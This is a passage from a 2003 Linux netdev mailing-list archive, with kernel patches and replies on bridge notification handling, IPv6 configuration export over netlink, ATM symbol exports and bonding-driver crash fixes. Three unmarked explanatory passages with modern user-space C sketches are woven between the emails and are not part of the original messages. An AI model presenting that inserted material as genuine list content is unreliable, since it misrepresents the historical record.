try_atm_clip_ops not atm_clip_ops_mutex # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Tue Jul 29 13:58:11 2003 +++ b/net/atm/common.c Tue Jul 29 13:58:11 2003 @@ -124,7 +124,7 @@ #ifdef CONFIG_ATM_CLIP_MODULE EXPORT_SYMBOL(atm_clip_ops); -EXPORT_SYMBOL(atm_clip_ops_mutex); +EXPORT_SYMBOL(try_atm_clip_ops); EXPORT_SYMBOL(atm_clip_ops_set); #endif #endif From shemminger@osdl.org Tue Jul 29 17:08:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 17:08:14 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U086Fl027246 for ; Tue, 29 Jul 2003 17:08:08 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6U07GI16180; Tue, 29 Jul 2003 17:07:18 -0700 Date: Tue, 29 Jul 2003 17:07:15 -0700 From: Stephen Hemminger To: Steffen Klassert , Christian Mautner , "David S. 
Miller" , Andrew Morton Cc: netdev@oss.sgi.com Subject: [PATCH] Fix bridge notification processing Message-Id: <20030729170715.7ff9bbc7.shemminger@osdl.org> In-Reply-To: <20030724102821.GA32274@gareth.mathematik.tu-chemnitz.de> References: <20030722234508.0af40e80.shemminger@osdl.org> <20030724033430.GA20304@mautner.ca> <20030724102821.GA32274@gareth.mathematik.tu-chemnitz.de> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4369 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 12:28:21 +0200 Steffen Klassert wrote: > I probably found the problem. > If I do > > brctl addbr br0 > brctl addif br0 eth0 > brctl addif br0 eth1 > ifconfig eth0 up > ifconfig eth1 up > ifconfig br0 up The bridge needs to ignore up/down notifications when it is down (like 2.4); somewhere with all the other changes I put in, a bug got in and it was looking at networks when the bridge is down. When bridge comes up it scans and sees the state... This applies against 2.6.0-test2 (i.e. after my earlier fixup patch). 
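As a rough user-space illustration of the rule described above (this is not the kernel code), the sketch below models a bridge that ignores port up/down events while the bridge device itself is down, and rescans port state when it is brought up. All names here (struct bridge_model, port_event, bridge_open) are hypothetical and exist only for this example; STP itself and all locking are left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define MAX_PORTS 4

enum port_event_type { PORT_UP, PORT_DOWN };

/* Hypothetical user-space model; not the kernel's bridge structures. */
struct port_model {
    bool link_up;      /* state of the underlying device */
    bool stp_enabled;  /* whether the bridge treats the port as active */
};

struct bridge_model {
    bool up;                           /* models br->dev->flags & IFF_UP */
    size_t nports;
    struct port_model ports[MAX_PORTS];
};

/* Handle a device notification for one port. */
static void port_event(struct bridge_model *br, size_t idx,
                       enum port_event_type ev)
{
    struct port_model *p;

    assert(idx < br->nports);
    p = &br->ports[idx];

    /* The link state is always recorded... */
    p->link_up = (ev == PORT_UP);

    /* ...but the bridging state only changes while the bridge is up. */
    if (!br->up)
        return;
    p->stp_enabled = p->link_up;
}

/* Bringing the bridge up scans every port and picks up its current state. */
static void bridge_open(struct bridge_model *br)
{
    br->up = true;
    for (size_t i = 0; i < br->nports; i++)
        br->ports[i].stp_enabled = br->ports[i].link_up;
}
```

In this model, an event that arrives while the bridge is down changes nothing but the recorded link state; the port only becomes active once bridge_open() runs its scan.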
diff -Nru a/net/bridge/br_notify.c b/net/bridge/br_notify.c --- a/net/bridge/br_notify.c Tue Jul 29 17:01:45 2003 +++ b/net/bridge/br_notify.c Tue Jul 29 17:01:45 2003 @@ -39,19 +39,23 @@ br = p->br; spin_lock_bh(&br->lock); + switch (event) { case NETDEV_CHANGEADDR: br_fdb_changeaddr(p, dev->dev_addr); - br_stp_recalculate_bridge_id(br); + if (br->dev->flags & IFF_UP) + br_stp_recalculate_bridge_id(br); break; case NETDEV_DOWN: - br_stp_disable_port(p); + if (br->dev->flags & IFF_UP) + br_stp_disable_port(p); break; case NETDEV_UP: - br_stp_enable_port(p); + if (br->dev->flags & IFF_UP) + br_stp_enable_port(p); break; case NETDEV_UNREGISTER: From krkumar@us.ibm.com Tue Jul 29 17:38:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 17:38:29 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U0buFl029493 for ; Tue, 29 Jul 2003 17:38:03 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6U0aQkh174948; Tue, 29 Jul 2003 20:36:26 -0400 Received: from linux-udp11864790uds.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6U0aMev093646; Tue, 29 Jul 2003 20:36:23 -0400 Date: Tue, 29 Jul 2003 17:33:03 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430 To: "David S. 
Miller" cc: kuznet@ms2.inr.ac.ru, , Subject: Re: O/M flags against 2.6.0-test1 In-Reply-To: <20030724000705.4662df54.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4370 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Another idea is to define the user structure: > > struct ipv6_kernel_devconf { > struct ipv6_user_devconf vals; > void *sysctl; > }; After the latest suggestion to use array instead of a structure, the patch being submitted doesn't make this change. I hope that is acceptable. > > > 3) Change "int" members of struct "ipv6_devconf" to "s32". > > > > All members (except use_tempaddr) seem to be >=0, should I change > > the definition to __u32 instead ? > > __u32 sounds fine. Since use_tempaddr can be -1, I am for the time being keeping all the variables as s32. If this is changed to __u32, then some code in addrconf.c needs to be modified. > I think something more like route metrics, ie. an array is more appropriate I guess you mean only the user interface to use route type metrics, not modify the existing cnf implementation to use this concept (eg remove the structure and define cnf_metrics[] with code similar to RTAX_HOPLIMIT, etc). So this patch doesn't change the usage in kernel, except now the user interface returns the config params in an array format. This patch applies on top of the prefix list patch. Thanks, - KK PS : Alexey's patch for ipv4 defines IFLA_INET_MAX as IFLA_INET_CONF, probably that should be IFLA_INET_MCAST. Another thing that confused me is that there is no addrconf_sysctl_register for ipv6_devconf, while it is being unregister'd (which would fail?). 
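To make the array-style user interface discussed in this message concrete, here is a small user-space sketch (not the submitted patch) of flattening a configuration structure into an array of 32-bit values. The names struct devconf_model, devconf_store and devconf_to_array are hypothetical, and only three fields are modelled. Note that the buffer is sized in bytes as element count times element size.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical, cut-down stand-in for struct ipv6_devconf. */
struct devconf_model {
    int32_t forwarding;
    int32_t hop_limit;
    int32_t use_tempaddr;   /* may legitimately be -1, hence a signed type */
    void *sysctl;           /* private pointer, never exported */
};

#define DEVCONF_MODEL_MAX 3  /* number of exported values in this sketch */

/* Copy the exported fields into array[]; returns how many were written. */
static int devconf_store(const struct devconf_model *cnf, int32_t *array)
{
    int i = 0;

    array[i++] = cnf->forwarding;
    array[i++] = cnf->hop_limit;
    array[i++] = cnf->use_tempaddr;
    return i;
}

/* Allocate and fill the array; the caller frees it. NULL on failure. */
static int32_t *devconf_to_array(const struct devconf_model *cnf, int *count)
{
    /* Size is given in bytes: number of elements times element size. */
    int32_t *array = malloc(DEVCONF_MODEL_MAX * sizeof(*array));

    if (array == NULL)
        return NULL;
    *count = devconf_store(cnf, array);
    assert(*count <= DEVCONF_MODEL_MAX);
    return array;
}
```

The private pointer is deliberately skipped, so the receiver sees only a count and a run of signed 32-bit values, much like a route metrics array.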
------------------------------------------------------------------------------ diff -ruN 1/linux-2.6.0-test1.plist/include/linux/ipv6.h linux-2.6.0-test1.new/include/linux/ipv6.h --- 1/linux-2.6.0-test1.plist/include/linux/ipv6.h 2003-07-13 20:36:33.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/ipv6.h 2003-07-29 17:02:57.000000000 -0700 @@ -122,6 +122,30 @@ struct in6_addr daddr; }; +/* + * This structure contains configuration options per IPv6 link. + */ +struct ipv6_devconf { + s32 forwarding; + s32 hop_limit; + s32 mtu6; + s32 accept_ra; + s32 accept_redirects; + s32 autoconf; + s32 dad_transmits; + s32 rtr_solicits; + s32 rtr_solicit_interval; + s32 rtr_solicit_delay; +#ifdef CONFIG_IPV6_PRIVACY + s32 use_tempaddr; + s32 temp_valid_lft; + s32 temp_prefered_lft; + s32 regen_max_retry; + s32 max_desync_factor; +#endif + void *sysctl; +}; + #ifdef __KERNEL__ #include /* struct sockaddr_in6 */ #include diff -ruN 1/linux-2.6.0-test1.plist/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- 1/linux-2.6.0-test1.plist/include/linux/rtnetlink.h 2003-07-29 12:05:26.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-29 14:49:16.000000000 -0700 @@ -477,10 +477,12 @@ #define IFLA_MASTER IFLA_MASTER IFLA_WIRELESS, /* Wireless Extension event - see wireless.h */ #define IFLA_WIRELESS IFLA_WIRELESS + IFLA_PROTINFO, /* Protocol specific information per link */ +#define IFLA_PROTINFO IFLA_PROTINFO }; -#define IFLA_MAX IFLA_WIRELESS +#define IFLA_MAX IFLA_PROTINFO #define IFLA_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg)))) #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg)) @@ -514,6 +516,18 @@ for IPIP tunnels, when route to endpoint is allowed to change) */ +/* Subtype attributes for IFLA_PROTINFO */ +enum +{ + IFLA_INET6_UNSPEC, + IFLA_INET6_FLAGS, /* link flags */ + IFLA_INET6_CONF, /* sysctl parameters */ + IFLA_INET6_STATS, /* statistics */ + IFLA_INET6_MCAST, /* MC 
things. What of them? */ +}; + +#define IFLA_INET6_MAX IFLA_INET6_MCAST + /***************************************************************** * Traffic control messages. ****/ diff -ruN 1/linux-2.6.0-test1.plist/include/net/if_inet6.h linux-2.6.0-test1.new/include/net/if_inet6.h --- 1/linux-2.6.0-test1.plist/include/net/if_inet6.h 2003-07-13 20:38:43.000000000 -0700 +++ linux-2.6.0-test1.new/include/net/if_inet6.h 2003-07-29 16:28:56.000000000 -0700 @@ -16,6 +16,7 @@ #define _NET_IF_INET6_H #include +#include #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 @@ -132,28 +133,6 @@ #define IFA_SITE IPV6_ADDR_SITELOCAL #define IFA_GLOBAL 0x0000U -struct ipv6_devconf -{ - int forwarding; - int hop_limit; - int mtu6; - int accept_ra; - int accept_redirects; - int autoconf; - int dad_transmits; - int rtr_solicits; - int rtr_solicit_interval; - int rtr_solicit_delay; -#ifdef CONFIG_IPV6_PRIVACY - int use_tempaddr; - int temp_valid_lft; - int temp_prefered_lft; - int regen_max_retry; - int max_desync_factor; -#endif - void *sysctl; -}; - struct ipv6_devstat { struct proc_dir_entry *proc_dir_entry; DEFINE_SNMP_STAT(struct icmpv6_mib, icmpv6); diff -ruN 1/linux-2.6.0-test1.plist/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- 1/linux-2.6.0-test1.plist/net/ipv6/addrconf.c 2003-07-29 12:05:26.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-29 15:54:42.000000000 -0700 @@ -2510,7 +2510,112 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +static int inline ipv6_store_devconf(struct ipv6_devconf *cnf, int *array) +{ + int i = 0; + + array[i++] = cnf->forwarding; + array[i++] = cnf->hop_limit; + array[i++] = cnf->mtu6; + array[i++] = cnf->accept_ra; + array[i++] = cnf->accept_redirects; + array[i++] = cnf->autoconf; + array[i++] = cnf->dad_transmits; + array[i++] = cnf->rtr_solicits; + array[i++] = cnf->rtr_solicit_interval; + array[i++] = cnf->rtr_solicit_delay; +#ifdef CONFIG_IPV6_PRIVACY + array[i++] = cnf->use_tempaddr; 
+ array[i++] = cnf->temp_valid_lft; + array[i++] = cnf->temp_prefered_lft; + array[i++] = cnf->regen_max_retry; + array[i++] = cnf->max_desync_factor; +#endif + return i; /* actual number of elements */ +} + +static int inet6_fill_ifinfo(struct sk_buff *skb, struct net_device *dev, + struct inet6_dev *idev, + int type, u32 pid, u32 seq) +{ + int num_items; + int *array = NULL; + struct ifinfomsg *r; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + struct rtattr *subattr; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r)); + if (pid) nlh->nlmsg_flags |= NLM_F_MULTI; + r = NLMSG_DATA(nlh); + r->ifi_family = AF_INET6; + r->ifi_type = dev->type; + r->ifi_index = dev->ifindex; + r->ifi_flags = dev->flags; + r->ifi_change = 0; + if (!netif_running(dev) || !netif_carrier_ok(dev)) + r->ifi_flags &= ~IFF_RUNNING; + else + r->ifi_flags |= IFF_RUNNING; + + RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name); + + subattr = (struct rtattr*)skb->tail; + + RTA_PUT(skb, IFLA_PROTINFO, 0, NULL); + RTA_PUT(skb, IFLA_INET6_FLAGS, sizeof(__u32), &idev->if_flags); + + /* + * using sizeof(struct) can be wrong due to padding, but it is the + * the maximum possible number of items, which gets corrected later. 
+ */ + num_items = sizeof(struct ipv6_devconf) / sizeof(*array); + if ((array = kmalloc(num_items * sizeof(*array), GFP_ATOMIC)) == NULL) + goto rtattr_failure; + num_items = ipv6_store_devconf(&idev->cnf, array); + RTA_PUT(skb, IFLA_INET6_CONF, num_items * sizeof(*array), array); + /* XXX stats/MC not implemented */ + subattr->rta_len = skb->tail - (u8*)subattr; + + nlh->nlmsg_len = skb->tail - b; + kfree(array); + return skb->len; + +nlmsg_failure: +rtattr_failure: + if (array) + kfree(array); + skb_trim(skb, b - skb->data); + return -1; +} + +static int inet6_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int idx, err; + int s_idx = cb->args[0]; + struct net_device *dev; + struct inet6_dev *idev; + + read_lock(&dev_base_lock); + for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) { + if (idx < s_idx) + continue; + if ((idev = in6_dev_get(dev)) == NULL) + continue; + err = inet6_fill_ifinfo(skb, dev, idev, RTM_NEWLINK, + NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq); + in6_dev_put(idev); + if (err <= 0) + break; + } + read_unlock(&dev_base_lock); + cb->args[0] = idx; + + return skb->len; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { + [RTM_GETLINK - RTM_BASE] = { .dumpit = inet6_dump_ifinfo, }, [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, [RTM_GETADDR - RTM_BASE] = { .dumpit = inet6_dump_ifaddr, }, From davem@redhat.com Tue Jul 29 22:26:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:26:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5Q7Fl017722 for ; Tue, 29 Jul 2003 22:26:08 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01359; Tue, 29 Jul 2003 22:22:43 -0700 Date: Tue, 29 Jul 2003 22:22:42 -0700 From: "David S.
Miller" To: Anton Blanchard Cc: netdev@oss.sgi.com, miltonm@bga.com Subject: Re: [PATCH] fix NAPI race Message-Id: <20030729222242.4ba89d51.davem@redhat.com> In-Reply-To: <20030729060509.GB13227@krispykreme> References: <20030729060509.GB13227@krispykreme> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4371 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 16:05:09 +1000 Anton Blanchard wrote: > Milton and I debugged an oops where we did list_del on a poisoned list > entry. It turns out there is nothing to order between list_del on > poll_list and the clear_bit that serialises list_add. Applied, thanks Anton. From davem@redhat.com Tue Jul 29 22:34:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:34:32 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5YSFl018126 for ; Tue, 29 Jul 2003 22:34:29 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01403; Tue, 29 Jul 2003 22:30:40 -0700 Date: Tue, 29 Jul 2003 22:30:39 -0700 From: "David S. 
Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, mitch@sfgoth.com, netdev@oss.sgi.com Subject: Re: [atmdrvr zatm] Remove obsolete EXACT_TS support Message-Id: <20030729223039.15ee3896.davem@redhat.com> In-Reply-To: <200307291717.h6THHosG027846@ginger.cmf.nrl.navy.mil> References: <20030728071323.GT32831@gaz.sfgoth.com> <200307291717.h6THHosG027846@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4372 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 13:15:09 -0400 chas williams wrote: > dave, please apply the following patch (hopefully one will arrive > shortly that removes cli() et al from zatm as well): Applied to 2.6.x, thanks. From davem@redhat.com Tue Jul 29 22:35:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:35:30 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5ZPFl018234 for ; Tue, 29 Jul 2003 22:35:25 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01430; Tue, 29 Jul 2003 22:31:57 -0700 Date: Tue, 29 Jul 2003 22:31:57 -0700 From: "David S. 
Miller" To: chas williams Cc: bellucda@tiscali.it, netdev@oss.sgi.com Subject: Re: [PATCH] replace current->state = x with set_current_state(x) in drivers/atm/* [2.6.0-test1] Message-Id: <20030729223157.5a829a64.davem@redhat.com> In-Reply-To: <200307291745.h6THjIsG028329@ginger.cmf.nrl.navy.mil> References: <200307252042.35832.bellucda@tiscali.it> <200307291745.h6THjIsG028329@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4373 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 13:42:36 -0400 chas williams wrote: > dave, please apply this to the 2.6 tree. Done, thanks. From davem@redhat.com Tue Jul 29 22:37:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:37:09 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5b5Fl018710 for ; Tue, 29 Jul 2003 22:37:05 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01446; Tue, 29 Jul 2003 22:33:27 -0700 Date: Tue, 29 Jul 2003 22:33:27 -0700 From: "David S. 
Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Message-Id: <20030729223327.5575a154.davem@redhat.com> In-Reply-To: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> References: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4374 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 13:57:05 -0400 chas williams wrote: > please apply to 2.4 -- thanks > > [atm]: export try_atm_clip_ops not atm_clip_ops_mutex Applied, will go into 2.4.23-preX Thanks. From hch@infradead.org Wed Jul 30 02:24:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 02:24:54 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U9OjFl001636 for ; Wed, 30 Jul 2003 02:24:46 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19hnCH-00012C-00; Wed, 30 Jul 2003 10:24:37 +0100 Date: Wed, 30 Jul 2003 10:24:37 +0100 From: Christoph Hellwig To: "David S. 
Miller" Cc: chas3@users.sourceforge.net, chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Message-ID: <20030730102437.B3901@infradead.org> References: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> <20030729223327.5575a154.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030729223327.5575a154.davem@redhat.com>; from davem@redhat.com on Tue, Jul 29, 2003 at 10:33:27PM -0700 X-archive-position: 4375 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Tue, Jul 29, 2003 at 10:33:27PM -0700, David S. Miller wrote: > On Tue, 29 Jul 2003 13:57:05 -0400 > chas williams wrote: > > > please apply to 2.4 -- thanks > > > > [atm]: export try_atm_clip_ops not atm_clip_ops_mutex > > Applied, will go into 2.4.23-preX Hmm, this looks like a fix for modular compilation and should probably go into 2.4.22.. 
From willy@w.ods.org Wed Jul 30 07:07:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:07:45 -0700 (PDT) Received: from www.home.local (willy.net1.nerim.net [62.212.114.60]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UE7YFl024558 for ; Wed, 30 Jul 2003 07:07:36 -0700 Received: from alpha.home.local (alpha [10.0.1.2]) by www.home.local (8.12.1/8.12.1) with ESMTP id h6UE70pn030528; Wed, 30 Jul 2003 16:07:01 +0200 Received: (from willy@localhost) by alpha.home.local (8.12.4/8.12.1) id h6UE6w5V014473; Wed, 30 Jul 2003 16:06:58 +0200 Date: Wed, 30 Jul 2003 16:06:58 +0200 From: Willy Tarreau To: davem@redhat.com, jgarzik@pobox.com, marcelo@conectiva.com.br Cc: netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: [PATCH] 2.4.22-pre9-bk : bonding bug fixes Message-ID: <20030730140658.GA14437@alpha.home.local> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-archive-position: 4376 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@w.ods.org Precedence: bulk X-list: netdev Hi Marcelo, David, Jeff... there are still a few bugs in the current bonding driver. I've reported them several times now, but perhaps not at the right places... So : - the first patch fixes a typo in the MODULE_PARM_DESC - the second one adds a comment and a warning around some code I don't understand, but which cannot be executed. It's within function bond_xmit_activebackup, and only executes if bond->mode != ACTIVEBACKUP.... - now the last one fixes a kernel panic due to a cheap hack which was introduced to determine the source IP address to use with ARP checks. It takes the first address of the first slave, and puts a lock on it. If there's no address, its ip_ptr is NULL, and the kernel panics while trying to get the lock. 
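The guard described for the third patch can be pictured with a small user-space model. This is only a sketch under stated assumptions: the structures below (net_device_model, in_device_model, ifaddr_model) and the helper first_ip_or_zero are hypothetical stand-ins, the locking is left out, and returning 0 when no address exists is a choice made for this example rather than what the driver does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical user-space stand-ins for the kernel structures. */
struct ifaddr_model {
    uint32_t address;
    struct ifaddr_model *next;
};

struct in_device_model {
    struct ifaddr_model *ifa_list;   /* may be empty */
};

struct net_device_model {
    struct in_device_model *ip_ptr;  /* NULL when no IPv4 state is attached */
};

/*
 * Return the first address configured on dev, or 0 if there is none.
 * Both pointers are checked before they are dereferenced.
 */
static uint32_t first_ip_or_zero(const struct net_device_model *dev)
{
    const struct in_device_model *in_dev;

    assert(dev != NULL);
    in_dev = dev->ip_ptr;

    if (in_dev == NULL)
        return 0;                    /* interface has no IPv4 state at all */
    if (in_dev->ifa_list == NULL)
        return 0;                    /* IPv4 state exists, but no address */
    return in_dev->ifa_list->address;
}
```

A slave that was never given an address takes the first early return instead of dereferencing a NULL pointer.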
You can reproduce it easily this way : # modprobe eth0 # modprobe bonding mode=active-backup miimon=1000 # ip link set bond0 up # ifenslave bond0 eth0 => kernel panic ! Now here are the patches. I really hope to get them into 2.4.22, since I'm a bit fed up with my server panicing each time I try a vanilla new kernel which I forget to patch... Cheers, Willy ======== first one ========== --- linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c Wed Jul 30 09:49:48 2003 +++ linux-2.4.22-pre9-bk-bond/drivers/net/bonding/bond_main.c Wed Jul 30 15:09:15 2003 @@ -524,7 +524,7 @@ MODULE_PARM(miimon, "i"); MODULE_PARM_DESC(miimon, "Link check interval in milliseconds"); MODULE_PARM(use_carrier, "i"); -MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 09 for off, 1 for on (default)"); +MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 0 for off, 1 for on (default)"); MODULE_PARM(mode, "s"); MODULE_PARM_DESC(mode, "Mode of operation : 0 for round robin, 1 for active-backup, 2 for xor"); MODULE_PARM(arp_interval, "i"); ======== second one ========== --- linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c Wed Jul 30 15:12:11 2003 +++ linux-2.4.22-pre9-bk-bond/drivers/net/bonding/bond_main.c Wed Jul 30 15:31:01 2003 @@ -3281,6 +3281,19 @@ memcpy(&my_ip, the_ip, 4); } + /* w.tarreau - 2003/07/30 + * I don't understand the logic here : + * - this code should be run only if we're NOT in active-backup mode, which + * is the only mode for which this function will be called. + * - the comment says the code tries to avoid sending broadcasts for ARP + * requests when the destination is known. This is obviously wrong since + * it will prevent you from changing the dead equipment you were checking + * without reloading the bonding driver ! High availability and low + * network usage never mix well ... + */ +#warning "This code may need a fix !" 
